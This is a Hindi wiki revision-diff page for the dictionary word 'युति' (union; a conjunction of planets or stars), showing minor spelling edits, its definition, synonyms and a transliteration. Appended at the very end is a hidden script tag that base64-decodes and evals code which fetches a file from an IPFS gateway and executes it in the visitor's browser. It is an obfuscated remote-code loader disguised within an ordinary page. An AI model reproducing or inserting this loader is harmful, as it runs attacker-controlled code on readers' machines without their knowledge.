Difference between revisions of "युति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{शब्द संदर्भ लघु |हिन्दी=एक वस्तु का दूसरी चीज के साथ ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "चीज " to "चीज़ ")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
|हिन्दी=एक वस्तु का दूसरी चीज के साथ मिलना, लगना या सटना, गणित में, दो या अधिक संख्याओं का जोड़, वह स्थिति जिसमें दो [[ग्रह]] या दो [[नक्षत्र]] इतने आस-पास या आमने-सामने होते हैं कि दोनों एक जान पड़ने लगते हैं।  
+
|हिन्दी=एक वस्तु का दूसरी चीज़ के साथ मिलना, लगना या सटना, गणित में, दो या अधिक संख्याओं का जोड़, वह स्थिति जिसमें दो [[ग्रह]] या दो [[नक्षत्र]] इतने आस-पास या आमने-सामने होते हैं कि दोनों एक जान पड़ने लगते हैं।  
 
|व्याकरण=स्त्रीलिंग
 
|व्याकरण=स्त्रीलिंग
|उदाहरण=[[चंद्रमा ग्रह|चंद्रमा]] और [[रोहिणी]] की '''युति'''
+
|उदाहरण=[[चंद्रमा ग्रह|चंद्रमा]] और रोहिणी की '''युति'''
 
|विशेष=ग्रहों की '''युति''' और ‘योग’ का अन्तर जानने के लिए देखें ‘योग’ का विशेष।
 
|विशेष=ग्रहों की '''युति''' और ‘योग’ का अन्तर जानने के लिए देखें ‘योग’ का विशेष।
 
|विलोम=
 
|विलोम=
|पर्यायवाची=एकता, ऐक्य, जुड़ाब, मेल, भाईचारा, यूनिटी
+
|पर्यायवाची=एकता, ऐक्य, जुड़ाव, मेल, भाईचारा, यूनिटी
 
|संस्कृत=यु+क्तिन्
 
|संस्कृत=यु+क्तिन्
 
|अन्य ग्रंथ=
 
|अन्य ग्रंथ=

Latest revision as of 08:06, 8 July 2011

shabd sandarbh
hindi ek vastu ka doosari chiz ke sath milana, lagana ya satana, ganit mean, do ya adhik sankhyaoan ka jo d, vah sthiti jisamean do grah ya do nakshatr itane as-pas ya amane-samane hote haian ki donoan ek jan p dane lagate haian.
-vyakaran    striliang
-udaharan   chandrama aur rohini ki yuti
-vishesh    grahoan ki yuti aur ‘yog’ ka antar janane ke lie dekhean ‘yog’ ka vishesh.
-vilom   
-paryayavachi    ekata, aiky, ju dav, mel, bhaeechara, yooniti
sanskrit yu+ktinh
any granth
sanbandhit shabd
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>